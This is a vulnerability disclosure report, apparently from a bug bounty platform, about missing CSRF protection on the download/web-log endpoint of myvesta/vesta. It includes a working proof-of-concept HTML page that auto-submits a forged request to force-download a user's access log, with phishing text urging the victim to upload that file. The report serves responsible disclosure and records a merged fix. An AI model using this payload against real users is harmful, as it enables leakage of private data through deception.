Cross-Site Request Forgery (CSRF) in myvesta/vesta

Valid

Reported on

Aug 24th 2021


✍️ Description

The download/web-log endpoint does not have CSRF Protection. This could be used to force download access log and potentially sensitive information leakage.

🕵️‍♂️ Proof of Concept

Login to user account. Create the following POC.html file and open the page in browser.

<html>
<body>
<h2>To verify that you are a human, upload the file that has been downloaded from our website now.</h2>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.myvesta.com/download/web-log/">
<input type="hidden" name="domain" value="demo&#46;myvesta&#46;com" />
<input type="hidden" name="type" value="access" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

This POC.html downloads user's data from the application without user's permission. An attacker can then cheat the user to upload this file into an attacker controlled server.

💥 Impact

Potential private information leakage through phishing by exploiting missing CSRF token.

💥 Test

Tested on Edge, Firefox, chrome and safari.

💥 Fix

You should set a CSRF token on such GET requests. 📍 Location index.php#L1 📝 References csrf 📍 Location index.php#L1 📝 References csrf

Occurences

References

We have contacted a member of the myvesta/vesta team and are waiting to hear back 3 months ago
Musio modified their report
3 months ago
Musio modified their report
3 months ago
myvesta validated this vulnerability 3 months ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta confirmed that a fix has been merged on 63861e 3 months ago
myvesta has been awarded the fix bounty